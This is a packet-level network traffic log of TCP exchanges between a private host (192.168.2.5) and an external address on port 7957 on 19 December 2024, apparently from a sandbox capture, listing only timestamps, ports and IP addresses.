Dec 19, 2024 09:30:00.471434116 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.471656084 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.471784115 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.472430944 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.472656965 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.472754955 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.473526001 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.473711967 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.473779917 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.474538088 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.474632025 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.474677086 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.475594997 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.475709915 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.475780010 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.476465940 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.476675034 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.476727962 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.477591038 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.477691889 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.477782011 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.478578091 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.478652000 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.478702068 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.479598999 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.479827881 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.479887009 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.480798960 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.480808973 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.480866909 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.481704950 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.481920958 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.481970072 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.482753992 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.483058929 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.483117104 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.483649015 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.483839989 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.483891010 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.484883070 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.484935999 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.484987974 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.485709906 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.485814095 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.485855103 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.486808062 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.486857891 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.487003088 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.487759113 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.487806082 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.487852097 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.488938093 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.488945961 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.488993883 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.489829063 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.489897966 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.489952087 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.490928888 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.491087914 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.491144896 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.491857052 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.491950035 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.492007971 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.492861032 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.492989063 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.493033886 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.494797945 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.494807959 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.494859934 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.494962931 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.495222092 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.495276928 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.495922089 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.496174097 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.496223927 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.497071981 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.497092962 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.497181892 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.498014927 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.498025894 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.498075008 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.498996019 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.499090910 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.499145031 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.500123978 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.500134945 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.500179052 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.501053095 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.501123905 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.501167059 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.502214909 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.502295017 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.502332926 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.503200054 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.503364086 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.503446102 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.504801989 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.504812002 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.504852057 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.505239010 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.505279064 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.505331039 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.506176949 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.506258011 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.506309032 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.507369041 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.507376909 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.507426977 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.508292913 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.508445024 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.508497953 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.509382963 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.509740114 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.509788036 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.510416031 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.510492086 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.510557890 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.511368990 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.511399031 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.511450052 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.512306929 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.512450933 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.512543917 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.513492107 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.513500929 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.513540983 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.514805079 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.514813900 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.514868975 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.515337944 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.565978050 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.654274940 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.654381037 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.654493093 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.654618025 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.654798031 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.654875040 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.656092882 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.656110048 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.656161070 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.656829119 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.656868935 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.656920910 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.657845020 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.658003092 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.658103943 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.658945084 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.658953905 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.659009933 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.660415888 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.660430908 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.660492897 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.661091089 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.661196947 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.661298037 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.662022114 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.662205935 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.662255049 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.663217068 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.663244009 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.663300991 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.664966106 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.665152073 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.665205956 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.667422056 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.667433977 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.667452097 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.667459011 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.667556047 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.667557955 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.667819023 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.667953014 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.668567896 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.668582916 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.668621063 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.669589043 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.669661999 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.669708967 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.670063019 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.670082092 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.670123100 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.670809031 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.670860052 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.670917988 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.671863079 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.672178030 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.672239065 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.673010111 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.673021078 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.673064947 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.673875093 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.674061060 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.674113989 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.674969912 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.675364017 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.675919056 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.675964117 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.676026106 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.676104069 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.679768085 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.679780960 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.679799080 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.679809093 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.679817915 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.679847956 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.679877996 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.679986954 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.680049896 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.681189060 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.681197882 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.681241989 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.681883097 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.682022095 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.682080984 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.682988882 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.682997942 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.683083057 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.684045076 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.684055090 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.684098005 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.684987068 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.684997082 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.685049057 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.685996056 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.686005116 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.686050892 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.686988115 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.687553883 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.687680960 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.688446999 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.688637972 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.688788891 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.689335108 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.689466000 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.689692974 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.690455914 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.690473080 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.690531015 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.691380978 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.691397905 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.691441059 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.692461967 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.692475080 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.692543983 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.693682909 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.693692923 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.693701982 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.693711042 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.693747997 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.693767071 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.694366932 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.695179939 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.695244074 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.697319984 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.697329998 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.697386980 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.697865009 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.697873116 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.697927952 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.698489904 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.698498964 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.698555946 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.699358940 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.699512959 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.699670076 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.700822115 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.700931072 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.700989008 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.701425076 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.701442003 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.701529026 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.703921080 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.703929901 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.703970909 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.704788923 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.705002069 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.705075979 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.705487013 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.705495119 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.705537081 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.706069946 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.706207037 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.706265926 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.707102060 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.707231045 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.707283974 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.708244085 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.708307981 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.708357096 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.709264994 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.753441095 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.846038103 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.846062899 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.846168995 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.846224070 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.846415997 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.847157001 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.847275019 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.847292900 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.847342968 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.848359108 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.848426104 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.848491907 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.849277020 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.849473000 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.849529028 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.850296974 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.850424051 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.850476027 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.851308107 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.851368904 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.851448059 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.852655888 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.852665901 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.852716923 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.853596926 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.853606939 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.853655100 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.854387999 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.854520082 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.854577065 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.855365992 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.855575085 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.855626106 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.856539011 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.856549978 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.856590986 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.857377052 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.857486963 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.857584000 CET	49811	7957	192.168.2.5	5.35.36.120
Dec 19, 2024 09:30:00.858437061 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.858527899 CET	7957	49811	5.35.36.120	192.168.2.5
Dec 19, 2024 09:30:00.858673096 CET	49811	7957	192.168.2.5	5.35.36.120
